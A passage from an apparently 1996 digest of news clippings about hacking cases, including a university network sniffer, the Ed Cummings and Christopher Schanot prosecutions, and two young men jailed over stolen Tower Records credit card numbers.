  14107.  
  14108. The authorities had no indication that the hacker deleted or altered
  14109. files, "although there was the potential for that", he said. Files
  14110. belonging to world-renowned research scientists may have been viewed or
  14111. copied, giving the hacker an insight into commercially and academically
  14112. sensitive material. 
  14113.  
  14114. The hacker used a so-called sniffer program, which sat silently within the
  14115. computer system for four weeks, monitoring its activities. This could
  14116. allow the hacker to compile a list of all passwords to give him unhindered
  14117. access to every computer on the university's network. "There was the
  14118. potential to access any material on any computer anywhere on the
  14119. university's network - ranging from electronic-mail to confidential
  14120. research data," said Mr Stibbs. 
  14121.  
  14122. -----------------------------------------------------------------------------
  14123.  
  14124. Agents' Codes Exposed on Web                                   March 16, 1996
  14125. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14126. By: Robert E. Kessler (Newsday)
  14127.  
  14128.  
  14129. In an attempt to help (Ed) Cummings, and discredit the Secret Service, a Long
  14130. Island-based hacker magazine last week launched a page on the World Wide
  14131. Web publishing lists of Secret Service radio frequencies, photographs of
  14132. agents, and codenames used by the agency for officials and buildings.
  14133.  
  14134. Last year, Cummings, a 35-year-old native of Reading, Pa., pleaded
  14135. guilty to federal charges in Philadelphia of possessing telecommunications
  14136. equipment with intent to defraud and served a seven-month prison sentence.
  14137.  
  14138. As a result of that conviction, last week Cummings was sentenced by a
  14139. judge in Easton, Pa., north of Philadelphia, to serve a six- to 24-month
  14140. sentence for violating probation after pleading no contest to a 1994 charge
  14141. of tampering with evidence in another telephone hacking case.
  14142.  
  14143. "Painting this guy as some white knight or someone who is standing up
  14144. for free speech is wrong," said Kun. "He's engaged in fraud."
  14145.  
  14146. Cummings' attorney, Kenneth Trujillo, could not be reached for comment.
  14147.  
  14148. -----------------------------------------------------------------------------
  14149.  
  14150. Judge Denies Bond to Accused Hacker                             April 6, 1996
  14151. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14152. by Tim Bryant (St. Louis Post Dispatch)
  14153.  
  14154. After another prisoner said accused computer hacker Christopher Schanot was
  14155. planning a quick escape from his parents' home near High Ridge, a federal
  14156. magistrate decided Friday to keep Schanot in jail.
  14157.  
  14158. "He said he would wait a couple of days and take off," testified the
  14159. prisoner, Gerald Esposito.
  14160.  
  14161. Schanot's lawyer, federal public defender Norm London, told Davis that
  14162. the alleged conversation between the young man and Esposito never happened.
  14163.  
  14164. London, pointing out that Esposito has convictions for sexual assault,
  14165. said the older prisoner had "made overtures" to jail officials about moving
  14166. Schanot into Esposito's housing area.
  14167.  
  14168. -----------------------------------------------------------------------------
  14169.  
  14170. Hacked Off! Government, Firms Fight Computer Intruders          April 7, 1996
  14171. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14172. by Colleen Bradford (St. Louis Post Dispatch)
  14173.  
  14174. Every day, hundreds of people in front of personal computers try to sneak
  14175. into corporate and government computer networks. Sometimes they just look
  14176. around, sometimes they destroy data and sometimes they steal personal and
  14177. classified information.
  14178.  
  14179. Two weeks ago, law enforcement officials charged an Argentine, 21, with
  14180. using the Internet to illegally break into computer networks at Department
  14181. of Defense installations, the NASA, Los Alamos National Laboratory and
  14182. several universities. The Justice Department is now seeking Julio Cesar
  14183. Ardita, who accessed confidential research files on aircraft design, radar
  14184. technology and satellite engineering.
  14185.  
  14186. And Chris Schanot, 19, from High Ridge, was in court in St. Louis last
  14187. week on charges of hacking. Schanot, who fled to Pennsylvania from St.
  14188. Louis after graduating from Vianney High School last May, is accused in a
  14189. five-count indictment of breaking into the computers of Southwestern Bell,
  14190. Bell Communications Research, Sprint and SRI International, a research and
  14191. development contractor with government contracts. His trial is set for June
  14192. 10.
  14193.  
  14194. Schanot, like other hackers, likely became addicted to the feeling of
  14195. power that cracking into a private computer network brings, said St. Louis
  14196. County Police Sgt. Thomas Lasater, who has been investigating computer
  14197. crime for seven years.
  14198.  
  14199. "Normally these young hackers do not use the computers for financial
  14200. gain," Lasater said. "It's just a challenge for them to see what they can
  14201. conquer."
  14202.  
  14203. -----------------------------------------------------------------------------
  14204.  
  14205. Mike and Terry's Dreadful Adventure
  14206. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  14207. by Elizabeth Weise (AP Newswire)
  14208.  
  14209. Terry Ewing was late.  His plane left in an hour and he was cutting it close.
  14210. But he couldn't tear himself away from his computer and the hole he'd hacked
  14211. into the security network of Tower Records.
  14212.  
  14213. He kept poking around, looking for something interesting to take to the
  14214. hackers' convention he was going to.  Finally, five minutes before the
  14215. airport shuttle beeped in front of his apartment, he downloaded a file
  14216. containing 1,700 credit card numbers. 
  14217.  
  14218. "We didn't expect anyone was watching," he said seven months later -
  14219. through an inch of Plexiglas at the Sacramento County Jail. 
  14220.  
  14221. Ewing had had second thoughts about taking the Tower Records file with
  14222. him on July 31, so he left it on his hard drive while he and Kim hit
  14223. DefCon, the biggest of the West Coast hacker gatherings, for a weekend of
  14224. bragging, hanging out and messing around. 
  14225.  
  14226. "We never guessed they were onto us.  Their security was so weak it
  14227. really blew," the 20-year-old Kim says by phone from the sixth floor of
  14228. the same jail that held his friend.  He is facing an 18-month sentence. 
  14229.  
  14230.